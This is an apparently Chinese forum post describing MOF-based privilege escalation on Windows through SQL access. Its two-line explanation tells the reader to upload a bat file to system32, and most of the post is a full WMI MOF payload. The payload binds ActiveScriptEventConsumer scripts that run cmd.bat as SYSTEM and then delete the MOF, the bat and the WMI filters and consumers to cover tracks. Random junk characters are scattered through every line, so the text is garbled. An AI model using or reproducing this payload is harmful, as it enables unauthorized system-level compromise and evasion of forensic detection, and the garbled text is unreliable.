这个sql提权MOF需要运行 system下的文件,不能定义路径。) x6 z0 C8 e4 i4 j' M
需要将要运行的命令写入到bat上传到system32目录,然后执行。
`3 Y# w6 H4 m- c; y" } c/ L! x P' _' O c) ]% ]& U
这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 S, W# H9 }5 H2 Z需要将要运行的命令写入到bat上传到system32目录,然后执行。+ ?" O& `4 R5 u7 R1 F6 x9 k
' x4 ?6 [9 p( v5 {& }, l# B
#pragma
9 L- W1 Z9 D, c0 b2 d" `3 m namespace("\\\\.\\root\\cimv2")
( W3 Q+ T; m- w1 C% A class/ X" ?: D9 F4 }* \
MyClass547
/ ?+ n v, U1 x* w { [key]7 F" l; A, ~; u5 p( F1 |
string
5 O b9 I4 m; z1 ^/ [7 H0 [ Name;+ H% y4 O6 ?& z7 b) \7 k( _* Q; C
};0 [5 U0 _$ f8 q9 w: Z& s; K
class8 C( ] U/ ~) d0 M+ {+ _
ActiveScriptEventConsumer
% j$ ]3 }( e: s' F! ^* D : __EventConsumer { [key] b% r2 {) k% T" `3 ^
string
p+ S6 y. e( C" I5 M6 I& T Name; [not_null]
8 B2 @* o$ M* D6 h3 G. y0 u% A string( x3 M$ q( `' ^3 |: B: k
ScriptingEngine; string
1 X# P: J! t1 I" o5 L0 i ScriptFileName; [template]
) U8 R+ G# I: J# U string
1 w; H8 ?9 ~' }, M' `2 r ScriptText; uint32 KillTimeout;/ K& R7 e) D/ n2 L
}; instance of __Win32Provider as $P {
4 b' N& c6 }) F0 n4 J8 y Name
8 R4 ]: B8 P3 B; U1 h8 b) s8 T1 q =
8 d! `/ w! X) q. { B "ActiveScriptEventConsumer"; CLSID =) Z3 C3 C$ l k+ V h" G
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";; H6 n4 e9 B( A' |
PerUserInitialization# D( Y& g6 T: [+ |# w* m. [
= TRUE;
1 v8 k3 D! w9 s$ i/ i7 t( w0 v, l9 B }; instance of __EventConsumerProviderRegistration { Provider
! P- L3 K* R, Q5 M8 g$ \6 B = $P; ConsumerClassNames
1 a/ v2 r B! ?6 m% l7 t =! k1 }$ u/ H$ v# k: s; b0 u* \) D5 t
{"ActiveScriptEventConsumer"};
; X. p' ~7 k! K0 D; a };
4 F6 I6 m ?- y Instance of ActiveScriptEventConsumer3 H1 j' `+ d$ z. w% v& N
as $cons { Name- h) R2 O9 _' B+ l* c. J9 a2 I
=
' a" C1 a9 G1 d) ~* o! w1 _ "ASEC"; ScriptingEngine/ C: U0 k& M9 s3 `7 [' U9 j
=: S9 x. |1 x' g( j2 r7 H
"JScript"; ScriptText; P H+ F, v1 n1 B' M
=- b' g1 n# M3 e& p
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
6 w6 D* F K4 T# s# M3 ?+ r Instance of ActiveScriptEventConsumer; |- C. }, d' Z
as $cons2 { Name
8 g, y$ q" j8 ^! [ =3 x% v) u( H C0 [- ?5 A
"qndASEC"; ScriptingEngine f+ h8 j/ R. d9 ?, | R
=
* v. B% h6 \& P# z! B "JScript"; ScriptText
& N! Q# s1 d: E2 F5 P3 n2 H1 j' d =
/ h' A% K0 T ]5 ^* n* h "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
. o$ {) O* B: K }; instance of __EventFilter as $Filt { Name
4 S* ^" i9 y. x( ] a' N =
# Q' F) V$ {8 Q; p, q. `4 Z "instfilt"; Query5 I0 i# L( O, G: H5 a- q& Q9 G/ [! ]9 A
=
6 u0 d( Q6 ~0 \9 M4 z* Z& \ "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage- s- e T; C% j2 _- |5 U
=8 I7 k, v* j: ?/ s
"WQL"; }; instance of __EventFilter as $Filt2 { Name
; m2 |) H6 s" Q5 k6 w% `# I =
& p6 ?; ?( [$ c: j "qndfilt"; Query
9 I0 P, u3 S4 [ d+ Z =
. E8 B* {! I7 [9 [. @ "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage A. @' i7 P) ]9 g
=
2 W* A0 F1 L8 r2 E "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer7 j0 M% ?2 s, h/ r
= $cons; Filter
6 Y7 Q) A; g3 E* O) L3 M = $Filt;+ b7 o- A c% ^6 ^
}; instance of __FilterToConsumerBinding as $bind2 { Consumer4 k9 u" S1 r9 W* X
= $cons2; Filter: N2 T" q: N5 i$ K" I' r- @
= $Filt2;
! l4 A* [. ]" S. l0 n }; instance of MyClass547' z% H, Q. I6 C0 `9 Y# ]* s6 [
as $MyClass { Name- X+ F1 I, w5 R X3 I5 O9 O" ?2 @
=8 I1 N6 d- z, t( E8 [
"ClassConsumer";5 m) p6 H) |9 D+ c
}; |